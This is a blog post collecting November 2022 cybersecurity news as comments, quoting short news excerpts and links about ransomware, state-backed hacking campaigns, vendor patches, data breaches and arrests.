This posting is here to collect cyber security news in November 2022.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
This posting is here to collect cyber security news in November 2022.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
349 Comments
Tomi Engdahl says:
Phishing drops IceXLoader malware on thousands of home, corporate devices https://www.bleepingcomputer.com/news/security/phishing-drops-icexloader-malware-on-thousands-of-home-corporate-devices/
A ongoing phishing campaign has infected thousands of home and corporate users with a new version of the IceXLoader’ malware. The authors of IceXLoader, a malware loader first spotted in the wild this summer, have released version 3.3.3, enhancing the tool’s functionality and introducing a multi-stage delivery chain.
Tomi Engdahl says:
US Health Dept warns of Venus ransomware targeting healthcare orgs https://www.bleepingcomputer.com/news/security/us-health-dept-warns-of-venus-ransomware-targeting-healthcare-orgs/
The U.S. Department of Health and Human Services (HHS) warned today that Venus ransomware attacks are also targeting the country’s healthcare organizations. In an analyst note issued by the Health Sector Cybersecurity Coordination Center (HC3), HHS’ security team also mentions that it knows about at least one incident where Venus ransomware was deployed on the networks of a U.S. healthcare org.
However, there is no known data leak site that threat actors deploying Venus ransomware are known to use for publishing stolen data online, according to HC3′s report.
Tomi Engdahl says:
Australian Federal Police say cybercriminals in Russia behind Medibank hack https://therecord.media/australian-federal-police-say-cybercriminals-in-russia-behind-medibank-hack/
The Australian Federal Police (AFP) has identified the perpetrators of the hack and attempted extortion of health insurance company Medibank, its commissioner told journalists on Friday. Giving a short press conference without taking questions, AFP Commissioner Reece Kershaw said the force was “undertaking covert measures and working around the clock with our domestic agencies and our international networks, including INTERPOL, ” as part of its investigation. “This is important because we believe that those responsible for the breach are in Russia, ” Kershaw said, explaining that the AFP’s “intelligence points to a group of loosely affiliated cyber criminals, who are likely responsible for past significant breaches in countries across the world.”
‘Hunt down the scumbags’: Australian government to ‘hack the hackers’
behind Medibank breach
https://www.sbs.com.au/news/article/hunt-down-the-scumbags-100-officers-working-on-medibank-optus-hacks-australian-government-says/rvi3iqq3i
The Australian government is going to “hunt down the scumbags”
responsible for the Medibank hack that compromised the private information of nearly 10 million customers, cyber security minister Clare O’Neil said. On Friday, the Australian Federal Police (AFP) announced that Russian cyber criminals were responsible for the Medibank hack. The Russian embassy in Australia said it was disappointed that the AFP had identified Russia-based criminals as the culprits without contacting Russian officials before the public announcement. “We encourage the AFP to duly get in touch with the respective Russian law enforcement agencies, ” the consulate said in a statement on Friday evening.
Tomi Engdahl says:
Apple Sued for Allegedly Deceiving Users With Privacy Settings
https://gizmodo.com/apple-iphone-privacy-analytics-class-action-suit-1849774313
Apple is facing a class action lawsuit for allegedly harvesting iPhone user data even when the company’s own privacy settings promise not to.
The suit, filed Thursday in California federal court, comes days after Gizmodo exclusively reported on research into how multiple iPhone apps send Apple analytics data, regardless of whether the iPhone Analytics privacy setting is turned on or off. The problem was spotted by two independent researchers at the software company Mysk, who found that the Apple App Store sends the company exhaustive information about nearly everything a user does in the app, despite a privacy setting, iPhone Analytics, which claims to “disable the sharing of Device Analytics altogether” when switched off. Gizmodo asked the researchers to run additional tests on other iPhone apps, including Apple Music, Apple TV, Books, and Stocks. The researchers found that the problem persists across most of Apple’s suite of built-in iPhone apps.
Tomi Engdahl says:
Ukraine says Russian hacktivists use new Somnia ransomware https://www.bleepingcomputer.com/news/security/ukraine-says-russian-hacktivists-use-new-somnia-ransomware/
Russian hacktivists have infected multiple organizations in Ukraine with a new ransomware strain called Somnia, ‘ encrypting their systems and causing operational problems. The Computer Emergency Response Team of Ukraine (CERT-UA) has confirmed the outbreak via an announcement on its portal, attributing the attacks to From Russia with Love’ (FRwL), also known as Z-Team, ‘ whom they track as UAC-0118. The group previously disclosed creating the Somnia ransomware on Telegram and even posted evidence of attacks against tank producers in Ukraine.
Tomi Engdahl says:
Android phone owner accidentally finds a way to bypass lock screen https://www.bleepingcomputer.com/news/security/android-phone-owner-accidentally-finds-a-way-to-bypass-lock-screen/
Cybersecurity researcher David Schtz accidentally found a way to bypass the lock screen on his fully patched Google Pixel 6 and Pixel 5 smartphones, enabling anyone with physical access to the device to unlock it. Exploiting the vulnerability to bypass the lock screen on Android phones is a simple five-step process that wouldn’t take more than a few minutes. Google has fixed the security issue on the latest Android update released last week, but it has remained available for exploitation for at least six months.
Tomi Engdahl says:
https://www.securityweek.com/chinese-spyware-targets-uyghurs-through-apps-report
Tomi Engdahl says:
https://www.securityweek.com/foxit-patches-several-code-execution-vulnerabilities-pdf-reader
Tomi Engdahl says:
https://www.securityweek.com/twitter-security-chief-resigns-musk-sparks-deep-concern
A top security officer for Twitter resigned on Thursday as new owner Elon Musk’s revamp of the platform saw a boomlet of fake accounts, drawing a rare warning from US regulators.
“I’ve made the hard decision to leave Twitter,” tweeted chief security officer Lea Kissner, who reportedly stepped down with other key privacy or security executives.
The walk-outs came a day after the chaotic launch of new features introduced by Musk following his $44 million buyout of the influential one-to-many messaging app.
Tomi Engdahl says:
https://www.securityweek.com/microsoft-links-prestige-ransomware-attacks-russian-state-sponsored-hackers
Tomi Engdahl says:
https://www.innofactor.com/fi/ajankohtaista/finland-events/tietoturvatorstai-xdr-mdr-ndr-edr–mita-hittoa-tietoturvalvonnan-termit-haltuun/
Tomi Engdahl says:
https://blog.trailofbits.com/2022/10/25/sqlite-vulnerability-july-2022-library-api/
Tomi Engdahl says:
Cisco Patches 33 Vulnerabilities in Enterprise Firewall Products
https://www.securityweek.com/cisco-patches-33-vulnerabilities-enterprise-firewall-products
Cisco this week announced the release of patches for 33 high- and medium-severity vulnerabilities impacting enterprise firewall products running Cisco Adaptive Security Appliance (ASA), Firepower Threat Defense (FTD), and Firepower Management Center (FMC) software.
The most severe of the security defects is CVE-2022-20927, a bug in the dynamic access policies (DAP) functionality of ASA and FTD software, allowing a remote, unauthenticated attacker to cause a denial-of-service (DoS) condition.
Due to improper processing of data received from the Posture (HostScan) module, an attacker could send crafted HostScan data to cause the affected device to reload, Cisco explains.
Equally severe (CVSS score of 8.6) is CVE-2022-20946, a DoS vulnerability in the generic routing encapsulation (GRE) tunnel decapsulation feature of FTD software releases 6.3.0 and later.
The issue exists because of memory handling errors during the processing of GRE traffic. An attacker can exploit the flaw by sending crafted GRE payloads through an affected device, causing it to restart.
Three other high-severity DoS vulnerabilities that Cisco resolved this week impact the Simple Network Management Protocol (SNMP) feature and the SSL/TLS client of ASA and FTD, and the processing of SSH connections of FMC and FTD.
Tomi Engdahl says:
Manish Singh / TechCrunch:
VideoLAN confirms India’s Ministry of Electronics and IT has removed its ban on downloading the VLC media player, in effect for over nine months
India lifts download ban on VLC
https://techcrunch.com/2022/11/14/india-lifts-download-ban-on-vlc/
India has lifted the download ban on VLC, more than nine months after it mysteriously blocked the official website of the popular media playback software in the South Asian market. VideoLAN, the popular software’s developer, filed a legal notice last month seeking an explanation from the nation’s IT and Telecom ministries for the block order.
The Ministry of Electronics and IT has removed its ban on the website of VLC media player, New Delhi-based advocacy group Internet Freedom Foundation, which provided legal support to VideoLAN, said on Monday. VideoLAN confirmed the order.
“This ban was put into place without any prior notice and without giving VideoLAN the opportunity of a hearing, which went against the 2009 Blocking Rules and the law laid down by the Supreme Court in Shreya Singhal v. Union of India. This was strange because VLC Media Player is an open-source software which is used by nearly 80 million Indians,” IFF said in a statement.
The vast majority of people rely on VLC’s official website to download the popular application.
“Most major ISPs [internet service providers] are banning the site, with diverse techniques,” Kempf said of the blocking in India. In light of the blocking, the site immediately observed a drop of 80% in traffic from the South Asian market, he told TechCrunch.
Security firm Symantec reported in April this year that the hacker group Cicada, which has ties with the Chinese government, was exploiting VLC Media Player as well as several other popular applications to gain remote access to the victim’s computers. Kempf said he was never contacted by any government agency.
VLC, downloaded over 3.5 billion times worldwide, is a local media player that doesn’t require internet access or connection to any particular service online for the vast majority of its features. A block on its website didn’t considerably impact the existing install base of VLC.
But by blocking the website, India was pushing its citizens to “shady websites that are running hacked version of VLC. So they are endangering their own citizens with this ban,” Kempf warned.
Tomi Engdahl says:
New “Earth Longzhi” APT Targets Ukraine and Asian Countries with Custom Cobalt Strike Loaders https://thehackernews.com/2022/11/new-earth-longzhi-apt-targets-ukraine.html
Entities located in East and Southeast Asia as well as Ukraine have been targeted at least since 2020 by a previously undocumented subgroup of APT41, a prolific Chinese advanced persistent threat (APT). Cybersecurity firm Trend Micro, which christened the espionage crew Earth Longzhi, said the actor’s long-running campaign can be split into two based on the toolset deployed to attack its victims.
The first wave from May 2020 to February 2021 is said to have targeted government, infrastructure, and healthcare industries in Taiwan and the banking sector in China, whereas the succeeding set of intrusions from August 2021 to June 2022 infiltrated high-profile victims in Ukraine and several countries in Asia. This included defense, aviation, insurance, and urban development industries in Taiwan, China, Thailand, Malaysia, Indonesia, Pakistan, and Ukraine.
Tomi Engdahl says:
Typhon Reborn With New Capabilities
https://unit42.paloaltonetworks.com/typhon-reborn-stealer/
In early August 2022, Cyble Research Labs (a cybercrime monitoring
service) uncovered a new crypto miner/stealer for hire that the malware author named Typhon Stealer. Shortly thereafter, they released an updated version called Typhon Reborn. Both versions have the ability to steal crypto wallets, monitor keystrokes in sensitive applications and evade antivirus products. This new version has increased anti-analysis techniques and more malicious features. The threat actors have also improved their stealer and file grabber features.
Tomi Engdahl says:
New KmsdBot Malware Hijacking Systems for Mining Crypto and Launch DDoS Attacks https://thehackernews.com/2022/11/new-kmsdbot-malware-hijacking-systems.html
A newly discovered evasive malware leverages the Secure Shell (SSH) cryptographic protocol to gain entry into targeted systems with the goal of mining cryptocurrency and carrying out distributed denial-of-service (DDoS) attacks. Dubbed KmsdBot by the Akamai Security Intelligence Response Team (SIRT), the Golang-based malware has been found targeting a variety of companies ranging from gaming to luxury car brands to security firms. “The botnet infects systems via an SSH connection that uses weak login credentials, ” Akamai researcher Larry W. Cashdollar said. “The malware does not stay persistent on the infected system as a way of evading detection.”
Tomi Engdahl says:
Whoosh confirms data breach after hackers sell 7.2M user records https://www.bleepingcomputer.com/news/security/whoosh-confirms-data-breach-after-hackers-sell-72m-user-records/
The Russian scooter-sharing service Whoosh has confirmed a data breach after hackers started to sell a database containing the details of 7.2 million customers on a hacking forum. Whoosh is Russia’s leading urban mobility service platform, operating in 40 cities with over 75, 000 scooters. On Friday, a threat actor began selling the stolen data on a hacking forum, which allegedly contains promotion codes that can be used to access the service for free, as well as partial user identification and payment card data. The company confirmed the cyberattack via statements on Russian media earlier this month but claimed that its IT experts had managed to thwart it successfully.
Tomi Engdahl says:
Poliisi iski nettihuijareihin: 59 pidätettiin tässä 3 ostajia vaanivaa uhkaa https://www.is.fi/digitoday/tietoturva/art-2000009200663.html
EUROPOL kertoo lokakuun kestäneestä operaatiosta, jossa pidätettiin 59 epäiltyä huijaria. 19 maata, Suomi mukaan lukien, kattanut tehoisku mursi rikollisten verkostoja, joissa käytettiin varastettuja luottokorttien tietoja ostoksiin verkkokaupoissa. Viranomaiset suorittivat etsintöjä paikoissa, joihin laittomasti ostettuja tuotteita oli toimitettu. Pidätysten lisäksi tuotteet takavarikoitiin, ja todistusaineiston toivotaan auttavan epäiltyjen syytteeseen asettamisessa. Tutkinnat jatkuvat useissa maissa, ja lisää pidätyksiä voi olla luvassa. Operaatio oli osa 2022 e-Commerce Action- eli eComm
2022 -hanketta.
Tomi Engdahl says:
.https://www.bleepingcomputer.com/news/microsoft/windows-kerberos-authentication-breaks-after-november-updates/.
Windows Kerberos authentication breaks after November updates.
Microsoft is investigating a new known issue causing enterprise domain controllers to experience Kerberos sign-in failures and other authentication problems after installing cumulative updates released during this month’s Patch Tuesday. Kerberos has replaced the NTLM protocol as the default authentication protocol for domain-connected devices on all Windows versions above Windows 2000. BleepingComputer readers also reported three days ago that the November updates break Kerberos “in situations where you have set the This account supports Kerberos AES 256 bit encryption’ or This account supports Kerberos AES
128 bit encryption’ Account Options set (i.e., msDS-SupportedEncryptionTypes attribute) on user accounts in AD.”
Tomi Engdahl says:
“The long, solder-heavy way to get root access to a Starlink terminal” Still remains theoretical.
The long, solder-heavy way to get root access to a Starlink terminal
https://arstechnica.com/gadgets/2022/11/the-long-solder-heavy-way-to-get-root-access-to-a-starlink-terminal/
Zapping the satellite board at just the right time can grant deeper access.
Getting root access inside one of Starlink’s dishes requires a few things that are hard to come by: a deep understanding of board circuitry, eMMC dumping hardware and skills, bootloader software understanding, and a custom PCB board. But researchers have proven it can be done.
In their talk “Glitched on Earth by Humans: A Black-Box Security Evaluation of the SpaceX Starlink User Terminal,” researchers at KU Leuven in Belgium detailed at Black Hat 2022 earlier this year how they were able to execute arbitrary code on a Starlink User Terminal (i.e., a dish board) using a custom-built modchip through a voltage fault injection. The talk took place in August, but the researchers’ slides and repository have recently made the rounds.
https://github.com/KULeuven-COSIC/Starlink-FI
Tomi Engdahl says:
Aiphone Intercom System Vulnerability Allows Hackers to Open Doors
https://www.securityweek.com/aiphone-intercom-system-vulnerability-allows-hackers-open-doors
A vulnerability in Aiphone intercom products allows attackers to breach the entry system and gain access to the building that uses it.
Aiphone is one of the largest global manufacturers of intercom systems, including audio and video entry systems for residential and corporate buildings.
Last week, researchers with Norwegian application security firm Promon published information on a vulnerability identified in several Aiphone products that could allow an attacker to easily breach the entry system using an NFC tag.
The security bug is tracked as CVE-2022-40903 and is described as an information disclosure vulnerability.
The issue was identified in June 2021 and impacts Aiphone device series GT-DMB, GT-DMB-N, and GT-DMB-LVN running firmware versions prior to 3.00, and GT-DB-VN devices running firmware version 2.00 or earlier.
Promon says that the bug allows an attacker to “use a mobile device with NFC capability to run a brute-force attack on the entry system” in order to find the admin passcode”.
Essentially, the system allows an attacker with network access to try every possible four-digit code combination to discover the admin passcode, Promon said, responding to a SecurityWeek inquiry.
According to Promon, “the exploit requires a modification app (a custom Android NFC host-based emulation app that mimics the behavior of the official administrative tool).”
Once they know the administrator passcode, the attacker can use it to add a new NFC tag into the system (by injecting the device’s serial number), for access into the building.
Given that the vulnerable Aiphone products do not store access logs, an organization may be unaware of any unauthorized access, as there would be no evidence of it on the device.
“Unfortunately, there’s no way of knowing if a device has been targeted by this type of attack,” Promon said.
Tomi Engdahl says:
Thales Denies Getting Hacked as Ransomware Gang Releases Gigabytes of Data
https://www.securityweek.com/thales-denies-getting-hacked-ransomware-gang-releases-gigabytes-data
French aerospace, defense, and security giant Thales claims to have found no evidence of its IT systems getting breached after a well-known ransomware group published gigabytes of data allegedly stolen from the company.
The cybercrime group LockBit last week published a 9.5 Gb archive file apparently containing information belonging to Thales. The malicious hackers previously announced that they would make files public unless Thales paid a ransom.
The leaked files seem to include both technical and corporate documents. The hackers claim to have obtained highly sensitive information related to the company’s operations, as well as “commercial documents, accounting files, customer files, drawings of clients structures, [and] softwares”.
Thales did confirm that a breach had occurred, just not of its own systems. Its security experts are aware of two likely sources of the theft. One of them has been confirmed to be the user account of a partner on a dedicated collaboration portal, which resulted in the disclosure of “a limited amount of information”.
https://www.thalesgroup.com/en/worldwide/group/press_release/thales-position-lockbit-30
Tomi Engdahl says:
https://www.wired.com/story/twitter-two-factor-sms-problems/amp
Twitter’s SMS Two-Factor Authentication Is Melting Down
Problems with the important security feature may be some of the first signs that Elon Musk’s social network is fraying at the edges.
Following two weeks of extreme chaos at Twitter, users are joining and fleeing the site in droves. More quietly, many are likely scrutinizing their accounts, checking their security settings, and downloading their data. But some users are reporting problems when they attempt to generate two-factor authentication codes over SMS: Either the texts don’t come or they’re delayed by hours.
The glitchy SMS two-factor codes mean that users could get locked out of their accounts and lose control of them. They could also find themselves unable to make changes to their security settings or download their data using Twitter’s access feature. The situation also provides an early hint that troubles within Twitter’s infrastructure are bubbling to the surface.
Not all users are having problems receiving SMS authentication codes, and those who rely on an authenticator app or physical authentication token to secure their Twitter account may not have reason to test the mechanism.
The meltdown comes less than two weeks after Twiter laid off about half of its workers, roughly 3,700 people. Since then, engineers, operations specialists, IT staff, and security teams have been stretched thin attempting to adapt Twitter’s offerings and build new features per new owner Elon Musk’s agenda.
Tomi Engdahl says:
Researchers Say China State-backed Hackers Breached a Digital Certificate Authority https://thehackernews.com/2022/11/researchers-say-china-state-backed.html
A suspected Chinese state-sponsored actor breached a digital certificate authority as well as government and defense agencies located in different countries in Asia as part of an ongoing campaign since at least March 2022. Symantec, by Broadcom Software, linked the attacks to an adversarial group it tracks under the name Billbug, citing the use of tools previously attributed to this actor. The activity appears to be driven by espionage and data-theft, although no data is said to have been stolen to date. “The targeting of a certificate authority is notable, as if the attackers were able to successfully compromise it to access certificates they could potentially use them to sign malware with a valid certificate, and help it avoid detection on victim machines, ” Symantec researchers said in a report shared with The Hacker News.
Tomi Engdahl says:
DTrack activity targeting Europe and Latin America https://securelist.com/dtrack-targeting-europe-latin-america/107798/
DTrack is a backdoor used by the Lazarus group. Initially discovered in 2019, the backdoor remains in use three years later. It is used by the Lazarus group against a wide variety of targets. For example, we’ve seen it being used in financial environments where ATMs were breached, in attacks on a nuclear power plant and also in targeted ransomware attacks. Essentially, anywhere the Lazarus group believes they can achieve some financial gain. According to KSN telemetry, SecureList has detected DTrack activity in Germany, Brazil, India, Italy, Mexico, Switzerland, Saudi Arabia, Turkey and the United States, indicating that DTrack is spreading into more parts of the world. The targeted sectors are education, chemical manufacturing, governmental research centers and policy institutes, IT service providers, utility providers and telecommunications.
Tomi Engdahl says:
Mastodon users vulnerable to password-stealing attacks https://portswigger.net/daily-swig/mastodon-users-vulnerable-to-password-stealing-attacks
Attackers could steal password credentials from Mastodon users due to a vulnerability in Glitch, a fork of Mastodon, a researcher has warned. Mastodon has risen in popularity in recent weeks, as many users moved to the social media platform as a replacement for Twitter, recently acquired by controversial businessman Elon Musk. “Everybody on infosec Twitter seemed to be jumping ship to the infosec.exchange Mastodon server, so I decided to see what the fuss was all about, ”
Gareth Heyes, of PortSwigger Research*, wrote in a blog post released today. Heyes found he was able to steal users’ stored credentials using Chrome’s autofill feature by tricking them into clicking a malicious element he had disguised as a toolbar.
Tomi Engdahl says:
Nasty SQL Injection Bug in Zendesk Endangers Sensitive Customer Data https://www.darkreading.com/cloud/nasty-sql-injection-bug-zendesk-endangers-sensitive-customer-data
Multiple security vulnerabilities in Zendesk’s Web-based customer relationship management (CRM) platform could have allowed attackers to access sensitive information from potentially any customer account a discovery that showcases application programming interface (API) endpoint weaknesses in enterprise software-as-a-solution (SaaS) applications. Researchers from Varonis Threat Labs discovered the issues specifically an SQL injection vulnerability and a logical access flaw in Zendesk Explore, a component of Zendesk’s platform, they said in a blog post published Nov. 15. Researchers found they could use the flaws to extract data from Zendesk Explore, including the list of tables from Zendesk’s relational database service (RDS) instance as well as all the information stored in the database. That info included email addresses of users, sales leads, deals from the CRM, live agent conversations, tickets, help center articles, and more, they said.
Zendesk Vulnerability Could Have Given Hackers Access to Customer Data
https://www.securityweek.com/zendesk-vulnerability-could-have-given-hackers-access-customer-data
An SQL injection vulnerability in Zendesk Explore could have allowed a threat actor to leak Zendesk customer account information, data security firm Varonis reports.
Zendesk Explore is the analytics and reporting service of Zendesk, a popular customer support software-as-a-service solution.
According to Varonis, two vulnerabilities in Zendesk Explore could have allowed an attacker to access conversations, comments, email addresses, tickets, and other information stored in Zendesk accounts with Explore enabled.
The two issues, however, were reported to Zendesk and patched before they could have any impact on customer data.
“There is no evidence that any Zendesk Explore customer accounts were exploited, and Zendesk started working on a fix the same day it was reported. The company fixed multiple bugs in less than one workweek with zero customer action required,” Varonis reports.
Tomi Engdahl says:
An SQL injection vulnerability in Zendesk Explore could have allowed a threat actor to leak Zendesk customer account information, data security firm Varonis reports.
Zendesk Explore is the analytics and reporting service of Zendesk, a popular customer support software-as-a-service solution.
According to Varonis, two vulnerabilities in Zendesk Explore could have allowed an attacker to access conversations, comments, email addresses, tickets, and other information stored in Zendesk accounts with Explore enabled.
The two issues, however, were reported to Zendesk and patched before they could have any impact on customer data.
“There is no evidence that any Zendesk Explore customer accounts were exploited, and Zendesk started working on a fix the same day it was reported. The company fixed multiple bugs in less than one workweek with zero customer action required,” Varonis reports.
Tomi Engdahl says:
Google to roll out Privacy Sandbox on Android 13 starting early 2023 https://www.bleepingcomputer.com/news/security/google-to-roll-out-privacy-sandbox-on-android-13-starting-early-2023/
Google announced today that they will begin rolling out the Privacy Sandbox system on a limited number of Android 13 devices starting in early 2023. The Privacy Sandbox for Android is a set of technologies Google introduced in February this year, aiming to limit the tracking of users while still providing advertisers with viable performance-measurement options. Since then, Google has debated various design proposals with app developers and marketers, refining the system and readying its components for tentative deployment.
“Beginning early next year, we plan to roll out the initial Privacy Sandbox Beta to Android 13 mobile devices so that developers can take the next steps in testing these new solutions, ” mentions today’s press release.
Tomi Engdahl says:
Top Zeus Botnet Suspect “Tank” Arrested in Geneva https://krebsonsecurity.com/2022/11/top-zeus-botnet-suspect-tank-arrested-in-geneva/
Vyacheslav “Tank” Penchukov, the accused 40-year-old Ukrainian leader of a prolific cybercriminal group that stole tens of millions of dollars from small to mid-sized businesses in the United States and Europe, has been arrested in Switzerland, according to multiple sources. Penchukov was named in a 2014 indictment by the U.S.
Department of Justice as a top figure in the JabberZeus Crew, a small but potent cybercriminal collective from Ukraine and Russia that attacked victim companies with a powerful, custom-made version of the Zeus banking trojan. The U.S. Federal Bureau of Investigation (FBI) declined to comment for this story. But according to multiple sources, Penchukov was arrested in Geneva, Switzerland roughly three weeks ago as he was traveling to meet up with his wife there.
Tomi Engdahl says:
Chinese Cyberespionage Group ‘Billbug’ Targets Certificate Authority
https://www.securityweek.com/chinese-cyberespionage-group-billbug-targets-certificate-authority
A Chinese state-sponsored cyberespionage group tracked as Billbug has been observed targeting a certificate authority in Asia, along with other entities, Symantec reports.
Also tracked as Lotus Blossom and Thrip, Billbug is an advanced persistent threat (APT) actor mainly targeting entities in Southeast Asia and the United States. It’s believed to have been active since at least 2009.
Starting March 2022, the group has been targeting multiple entities in Asia, including a certificate authority, a government organization, and defense agencies.
“The targeting of a certificate authority is notable, as if the attackers were able to successfully compromise it to access certificates they could potentially use them to sign malware with a valid certificate, and help it avoid detection on victim machines. It could also potentially use compromised certificates to intercept HTTPS traffic,” Symantec notes.
According to the security company, however, there is no evidence to suggest that the threat actor has managed to successfully compromise digital certificates.
As part of the observed attacks, the APT used multiple public tools and custom malware, including AdFind, Certutil, NBTscan, Ping, Port Scanner, Route, Stowaway Proxy Tool, Tracert, Winmail, and WinRAR, as well as the Hannotog and Sagerunex backdoors identified in 2019.
Tomi Engdahl says:
Long-Standing Chinese Cybercrime Campaign Spoofs Over 400 Brands
https://www.securityweek.com/long-standing-chinese-cybercrime-campaign-spoofs-over-400-brands
Threat intelligence firm Cyjax has uncovered a long-standing and sophisticated cybercrime campaign spoofing more than 400 popular brands.
Orchestrated by a Chinese threat actor tracked as ‘Fangxiao’, the campaign has been ongoing for roughly five years, with more than 42,000 unique domains identified to date.
Likely financially motivated, the threat actor behind the campaign is employing typical lures, exploiting news about global events to trick potential victims into accessing their malicious websites.
On WhatsApp, the attackers send links to websites impersonating trusted brands across multiple verticals, including banking, energy, retail, and travel. Some of the spoofed brands include Coca Cola, Emirates, Knorr, Indonesia’s Indomie, McDonald’s, Singapore’s Shopee, and Unilever.
“Promised financial or physical incentives are used to trick victims into further spreading the campaign via WhatsApp. Once victims are psychologically invested in the phish, they are redirected through a series of sites owned by advertising agencies, earning Fangxiao money. Victims end up in a wide range of suspicious destinations, from Android malware to fake gift card imposter scams,” Cyjax explains.
https://www.cyjax.com/app/uploads/2022/11/Fangxiao-a-Chinese-threat-actor.pdf
Tomi Engdahl says:
Organizations Warned of Critical Vulnerability in Backstage Developer Portal Platform
https://www.securityweek.com/organizations-warned-critical-vulnerability-backstage-developer-portal-platform
Backstage, an open platform for building developer portals, is affected by a critical vulnerability whose exploitation could have a serious impact on a targeted enterprise, according to cloud-native application security firm Oxeye.
Backstage was developed by Spotify and donated to the Cloud Native Computing Foundation. It provides a catalog for managing all of the user’s software, software templates to make it easier to create projects, and open source plugins that can be used to expand its customizability and functionality.
The platform is used by many major organizations, including Netflix, American Airlines, Doordash, Palo Alto Networks, HP, Siemens, LinkedIn, and Booz Allen Hamilton.
Backstage is affected by a critical vulnerability related to a security hole found earlier this year by Oxeye in the popular sandbox library VM2. The VM2 flaw, dubbed SandBreak and tracked as CVE-2022-36067, can allow a remote attacker to escape the sandbox and execute arbitrary code on the host.
Backstage has been using VM2 and Oxeye researchers discovered that CVE-2022-36067 can be exploited for unauthenticated remote code execution in Backstage by abusing its software templates. An attacker who can successfully exploit the vulnerability could carry out various actions in the compromised organization’s network.
Tomi Engdahl says:
”Sosiaalinen DOS-hyökkäys localhostiin” – Yle: 133,7 milj. tulot ilmoittanut koodari myönsi ”lakihakkeroinnin”
https://www.tivi.fi/uutiset/sosiaalinen-dos-hyokkays-localhostiin-yle-133-7-milj-tulot-ilmoittanut-koodari-myonsi-lakihakkeroinnin/0edec813-1f3e-427d-af3a-b06d61f0b725
Vitsikkään tempun ei koskaan pitänyt mennä näin pitkälle.
Suomen verotilastojen kärkeen ponkaissut yllätysnimi Juhapekka Piiroinen yllättyi itsekin, kun tietojen tultua mediassa julki ovikello soi kymmenen tuntia.
Piiroinen myönsi Ylelle, että hänen aiemmin näppäilyvirheeksi luonnehtimansa tapaus oli ”hakkerointia”. Numerosarja 1337 eli leet-koodi ei ollut puhdas sattuma, minkä moni jo arvasikin.
Selitykseksi Piiroinen kertoo huomanneensa, että lain mukaan liian suurten tulojen ilmoittamisesta ei rangaista. Veroja koskevassa lainsäädännössä ei mainita sanktioita liian suurten tulojen ilmoittamisesta. Rikoslain mukaan veropetokseen syyllistyy vain, jos kyse on taloudellisen hyödyn tavoittelemisesta. Piiroisen mielestä lakia tulisi muuttaa porsaanreiän tilkitsemiseksi, jotta verottajalle ei tule lisää työtä vastaavista tapauksista.
”Tärkeintä on korjata virheet ja pyytää anteeksi, ei hakea julkisuutta”, Piiroinen kommentoi Ylelle.
Tosin Piiroisen ei kuulemma ollut tarkoitus lähettää veroilmoitusta, johon hän oli täyttänyt tiedot.
Tempaus toimii varoittavana esimerkkinä, jonka jälkeen harvan toivottavasti tekee mieli tehdä samaa temppua perässä ensi vuonna. Piiroinen nimittäin yllättyi, kuinka paljon huomiota erheellinen tieto verokuninkuudesta toi.
”Ohjelmointia tekevänä ihmisenä minulla verhot ovat normaalisti kiinni, eikä ulko-ovea avata, ellei ole erikseen sovittu. Tuntui jopa, että tämä oli sellainen sosiaalinen DOS-hyökkäys medialta localhostiin”, Piiroinen kommentoi Ylelle.
Emily Elizabeth says:
https://tvdit.com/blog/what-is-cyber-security/
Tomi Engdahl says:
Kiinalaiset väärensivät 42 000 verkkosivua – tunnetun brändin sivuilta latautuukin troijalainen
15.11.202221:02
Valesivustojen takana on kiinalainen ryhmä, joka ohjaa käyttäjiä haitallisille sivuille
https://www.mikrobitti.fi/uutiset/kiinalaiset-vaarensivat-42-000-verkkosivua-tunnetun-brandin-sivuilta-latautuukin-troijalainen/218cc863-4f67-4f62-9c64-d5181a635403
Tomi Engdahl says:
Firefox 107 Patches High-Impact Vulnerabilities
https://www.securityweek.com/firefox-107-patches-high-impact-vulnerabilities
Mozilla has announced the release of Firefox 107. The latest version of the popular web browser patches a significant number of vulnerabilities.
A total of 19 CVE identifiers have been assigned to the security holes patched by Firefox 107, and nine of them have been assigned a ‘high impact’ rating.
The high-impact flaws include issues that could lead to information disclosure, fullscreen notification bypass that could be used for spoofing attacks, and crashes or arbitrary code execution resulting from use-after-free bugs.
Multiple memory safety bugs discovered by Mozilla developers have been assigned a single CVE and a ‘high impact’ rating.
Tomi Engdahl says:
Remote Code Execution Vulnerabilities Found in F5 Products
https://www.securityweek.com/remote-code-execution-vulnerabilities-found-f5-products
Researchers at cybersecurity firm Rapid7 have identified several vulnerabilities and other potential security issues affecting F5 products.
Rapid7 reported its findings to the vendor in mid-August and disclosed details on Wednesday, just as F5 released advisories to inform customers about the security holes and the availability of engineering hotfixes.
Two of the issues discovered by Rapid7 researchers have been described as high-severity remote code execution vulnerabilities and assigned CVE identifiers, while the rest are security bypass methods that F5 does not view as vulnerabilities.
The most serious vulnerability is CVE-2022-41622, a cross-site request forgery (CSRF) issue affecting BIG-IP and BIG-IQ products. Exploitation can allow a remote, unauthenticated attacker to gain root access to a device’s management interface, even if the interface is not exposed to the internet.
However, exploitation requires the attacker to have some knowledge of the targeted network and they need to convince a logged-in administrator to visit a malicious website that is set up to exploit CVE-2022-41622.
“If exploited, the vulnerability can compromise the complete system,” F5 wrote in its advisory.
The second vulnerability, CVE-2022-41800, allows an attacker with admin privileges to execute arbitrary shell commands via RPM specification files.
Tomi Engdahl says:
US Gov Warning: Start Hunting for Iranian APTs That Exploited Log4j
https://www.securityweek.com/us-gov-warning-start-hunting-iranian-apts-exploited-log4j
The U.S. government on Wednesday issued a blunt recommendation for organizations running VMWare Horizon servers: Initiate threat-hunting activities to find and expel Iranian APT actors that used the Log4j crisis to slip undetected into corporate networks.
According to a joint advisory from CISA and the FBI, Iranian government-sponsored hackers hit at least one Federal Civilian Executive Branch (FCEB) organization with an exploit for a Log4j vulnerability in an unpatched VMware Horizon server.
Tomi Engdahl says:
Magento Vulnerability Increasingly Exploited to Hack Online Stores
https://www.securityweek.com/magento-vulnerability-increasingly-exploited-hack-online-stores
E-commerce malware and vulnerability detection firm Sansec warns of a surge in cyberattacks targeting CVE-2022-24086, a critical mail template vulnerability affecting Adobe Commerce and Magento stores.
Adobe released emergency patches for CVE-2022-24086 (CVSS score of 9.8) in February 2022, warning the owners and administrators of online stores that the security issue was already being exploited in attacks.
Tomi Engdahl says:
US govt: Iranian hackers breached federal agency using Log4Shell exploit https://www.bleepingcomputer.com/news/security/us-govt-iranian-hackers-breached-federal-agency-using-log4shell-exploit/
